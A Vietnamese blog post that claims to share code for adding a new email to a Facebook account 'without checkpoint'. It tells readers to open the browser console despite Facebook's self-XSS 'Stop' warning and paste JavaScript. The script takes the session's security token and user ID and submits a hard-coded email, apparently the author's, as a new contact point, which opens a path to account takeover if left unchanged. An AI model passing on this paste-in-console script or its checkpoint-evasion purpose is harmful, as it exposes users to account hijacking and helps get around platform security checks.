Share code thêm email mới vào tài khoản Facebook không checkpoint


Lời nói:

Việc thêm một địa chỉ email mới và lạ vào tài khoản Facebook rất dễ dẫn đến tình trạng bị checkpoint (khóa bảo mật). Vậy làm cách nào để thực hiện việc này một cách an toàn nhất? Cùng theo dõi bài viết nàu nhé !

Hướng dẫn chi tiết:

Bước 1: Truy cập https://www.facebook.com/settings/?tab=account trên trình duyệt web
Bước 2: Bấm chuột phải vào màn hình → chọn Kiểm tra
Bước 3: Cửa sổ Dev Tools được bật lên → chọn tab Console → Màn hình hiển thị cảnh báo "Dừng lại"
Bước 4: Copy toàn bộ code dưới đây
var spinR = require(["SiteData"]).__spin_r;
var spinB = require(["SiteData"]).__spin_b;
var spinT = require(["SiteData"]).__spin_t;
var jazoest = require(["SprinkleConfig"]).jazoest;
var fbdtsg = require(["DTSGInitData"]).token;
var userId = require(["CurrentUserInitialData"]).USER_ID;
var hsi = require(["SiteData"]).hsi;
var email = "phantrungtrucofficial@gmail.com";
var url = "https://www.facebook.com/add_contactpoint/dialog/submit/";
var data = "jazoest=22134&fb_dtsg=" + fbdtsg + "&next=&contactpoint=" + email + "&__user=" + userId + "&__a=1&__dyn=&__req=1&__be=1&__pc=PHASED%3ADEFAULT&dpr=1&__rev=&__s=&__hsi=" + hsi + "&__spin_r=" + spinR + "&__spin_b=" + spinB + "&__spin_t=" + spinT;
fetch(url, {
	method: 'POST',
	body: data,
	headers: {
		'Content-Type': 'application/x-www-form-urlencoded'
	}
}).then(e => e.text()).then(e => {})
• Thay phantrungtrucofficial@gmail.com thành email của bạn !

• Nếu bạn muốn tiện lợi hơn có thể dùng tool này sử dụng ngay 💙


Share by: BlogCuaTruc

Đăng nhận xét

Mới hơn Cũ hơn